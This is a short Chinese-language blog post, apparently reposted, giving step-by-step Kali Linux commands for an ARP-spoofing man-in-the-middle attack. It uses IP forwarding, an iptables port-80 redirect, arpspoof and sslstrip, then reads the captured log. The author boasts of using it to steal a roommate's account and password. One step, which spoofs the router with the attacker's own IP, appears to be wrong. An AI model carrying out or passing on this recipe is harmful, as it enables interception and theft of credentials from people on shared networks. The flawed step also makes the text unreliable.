Kali基于路由器的ARP欺骗转发机制

这里假设 RouteIP:192.168.1.1 OwnIP:192.168.1.100  TargetIP:192.168.1.101

1.echo 1> /proc/sys/net/ipv4/ip_forward 

2.cat /proc/sys/net/ipv4/ip_forward 如果显示是1 第一步可以不做
3.iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
4.arpspoof -i eth0 (ifconfig -a 查看所选用网络模块,eth0 有线 )-t (Target IP)  (Route IP) 
Eg:arpspoof -i eth0 -t 192.168.1.101 192.168.1.1  实现中断
5arpspoof -i eth0 -t (Route IP) (Own IP)
Eg:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
6.sslstrip -p -l 10000 (实现转发机制)
7.tail -f sslstrip.log (读取转发记录)
 
现在就可以看到客户端的信息了,http的一般都能截取到,https的就没戏了.呵呵成功获取了室友的账号和密码~~~
原文地址:https://www.cnblogs.com/i0ject/p/3656523.html